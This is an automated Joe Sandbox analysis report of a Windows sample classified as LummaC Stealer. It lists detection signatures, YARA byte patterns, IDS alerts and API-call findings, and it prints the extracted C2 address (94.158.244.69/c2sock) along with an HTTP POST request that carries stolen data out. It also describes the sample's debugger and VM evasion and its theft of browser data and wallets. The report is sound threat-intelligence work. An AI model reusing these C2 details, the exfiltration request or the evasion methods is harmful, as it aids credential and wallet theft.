Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cgln32y2HF.exe

Overview

General Information

Sample name:cgln32y2HF.exe
renamed because original name is a hash value
Original sample name:4b553069c339246833d06bdc506d9bf61010357a10ac56eb2e7ba59bbc01fd6f.exe
Analysis ID:1555039
MD5:21f41d9ec4e120f5bc7d543cde6a9cee
SHA1:1f0011eb8d2f01975e8291ebfe8efeccd7e44cb4
SHA256:4b553069c339246833d06bdc506d9bf61010357a10ac56eb2e7ba59bbc01fd6f
Tags:94-158-244-69exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Delayed program exit found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables driver privileges
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential time zone aware malware
Program does not show much activity (idle)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cgln32y2HF.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\cgln32y2HF.exe" MD5: 21F41D9EC4E120F5BC7D543CDE6A9CEE)
  • cleanup
{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LummaCStealer_1Yara detected LummaC StealerJoe Security
    dump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.4572460076.0000000000799000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1140:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          00000000.00000003.2109855914.00000000023A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.3.cgln32y2HF.exe.23a0000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              0.2.cgln32y2HF.exe.400000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                0.2.cgln32y2HF.exe.400000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                  0.3.cgln32y2HF.exe.23a0000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:51:36.232008+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549755TCP
                    2024-11-13T10:52:14.410644+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549965TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:50:45.112747+010020432061A Network Trojan was detected192.168.2.54997994.158.244.6980TCP
                    2024-11-13T10:50:45.112747+010020432061A Network Trojan was detected192.168.2.54983694.158.244.6980TCP
                    2024-11-13T10:51:47.843734+010020432061A Network Trojan was detected192.168.2.54978894.158.244.6980TCP
                    2024-11-13T10:52:05.903144+010020432061A Network Trojan was detected192.168.2.54988094.158.244.6980TCP
                    2024-11-13T10:52:14.894678+010020432061A Network Trojan was detected192.168.2.54992994.158.244.6980TCP
                    2024-11-13T10:52:23.675839+010020432061A Network Trojan was detected192.168.2.54997894.158.244.6980TCP
                    2024-11-13T10:52:41.586763+010020432061A Network Trojan was detected192.168.2.54998094.158.244.6980TCP
                    2024-11-13T10:52:42.381649+010020432061A Network Trojan was detected192.168.2.54998294.158.244.6980TCP
                    2024-11-13T10:52:59.612142+010020432061A Network Trojan was detected192.168.2.54998394.158.244.6980TCP
                    2024-11-13T10:53:08.398262+010020432061A Network Trojan was detected192.168.2.54998494.158.244.6980TCP
                    2024-11-13T10:53:17.308529+010020432061A Network Trojan was detected192.168.2.54998594.158.244.6980TCP
                    2024-11-13T10:53:26.119013+010020432061A Network Trojan was detected192.168.2.54998694.158.244.6980TCP
                    2024-11-13T10:53:35.006309+010020432061A Network Trojan was detected192.168.2.54998794.158.244.6980TCP
                    2024-11-13T10:53:43.823782+010020432061A Network Trojan was detected192.168.2.54998894.158.244.6980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:52:42.381649+010028438641A Network Trojan was detected192.168.2.54998294.158.244.6980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000002.4574352613.00000000033F3000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
                    Source: cgln32y2HF.exeReversingLabs: Detection: 86%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: cgln32y2HF.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004052D9 CryptUnprotectData,0_2_004052D9

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeUnpacked PE file: 0.2.cgln32y2HF.exe.400000.0.unpack
                    Source: cgln32y2HF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02382223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_02382223
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0238216F FindFirstFileExW,0_2_0238216F

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49788 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49929 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49880 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49982 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49982 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49980 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49984 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49983 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49985 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49987 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49986 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49988 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49978 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49979 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.5:49836 -> 94.158.244.69:80
                    Source: Malware configuration extractorURLs: http://94.158.244.69/c2sock
                    Source: Joe Sandbox ViewIP Address: 94.158.244.69 94.158.244.69
                    Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49755
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49965
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownHTTP traffic detected: POST /c2sock HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: TeslaBrowser/5.5Content-Length: 16455Host: 94.158.244.69
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/
                    Source: cgln32y2HF.exe, 00000000.00000002.4572489278.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/#
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/7?
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/B
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/T
                    Source: cgln32y2HF.exe, 00000000.00000002.4574352613.00000000033F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock
                    Source: cgln32y2HF.exe, 00000000.00000002.4574352613.00000000033F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock9Q
                    Source: cgln32y2HF.exe, 00000000.00000002.4574352613.00000000033F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockJQ
                    Source: cgln32y2HF.exe, 00000000.00000002.4574352613.00000000033F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socklQ
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socks
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/o
                    Source: cgln32y2HF.exe, 00000000.00000002.4575281035.000000000373C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69:80/c2sock
                    Source: cgln32y2HF.exe, 00000000.00000002.4575281035.000000000373C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69:80/c2sock~f
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: cgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: cgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: cgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: cgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: cgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: cgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: cgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: cgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

                    System Summary

                    barindex
                    Source: 00000000.00000002.4572460076.0000000000799000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW,0_2_0040B81C
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00422177 NtQueryInformationProcess,0_2_00422177
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW,0_2_0040A928
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose,0_2_0040B129
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042F1C2 NtClose,0_2_0042F1C2
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004244E4 NtSetInformationThread,0_2_004244E4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004224A3 NtQueryInformationProcess,0_2_004224A3
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004245EC NtQuerySystemInformation,0_2_004245EC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00421EEB NtQueryInformationProcess,0_2_00421EEB
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040B7BB lstrcmpW,NtClose,0_2_0040B7BB
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040B7F5 NtClose,0_2_0040B7F5
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040B81C0_2_0040B81C
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042C0DA0_2_0042C0DA
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004340800_2_00434080
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040E14E0_2_0040E14E
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040A9280_2_0040A928
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040B1290_2_0040B129
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042B9C50_2_0042B9C5
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004069A10_2_004069A1
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041F9A40_2_0041F9A4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041C2700_2_0041C270
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042F2780_2_0042F278
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040620B0_2_0040620B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004302280_2_00430228
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004052D90_2_004052D9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00436ADC0_2_00436ADC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00405AAA0_2_00405AAA
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043B3620_2_0043B362
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004024760_2_00402476
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042FD350_2_0042FD35
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042AD820_2_0042AD82
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042D6580_2_0042D658
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00430E6C0_2_00430E6C
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00438E280_2_00438E28
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042CFBA0_2_0042CFBA
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041204D0_2_0041204D
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004410570_2_00441057
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004150700_2_00415070
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004488000_2_00448800
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043D8D00_2_0043D8D0
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041E0830_2_0041E083
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0044915B0_2_0044915B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0045D15A0_2_0045D15A
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041316D0_2_0041316D
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040112C0_2_0040112C
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004279E00_2_004279E0
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041D1E90_2_0041D1E9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004109FC0_2_004109FC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040D9940_2_0040D994
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0044F2440_2_0044F244
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041AA490_2_0041AA49
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041B2510_2_0041B251
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00429A5B0_2_00429A5B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004102180_2_00410218
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00410A330_2_00410A33
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00414A830_2_00414A83
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0044234A0_2_0044234A
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0040136E0_2_0040136E
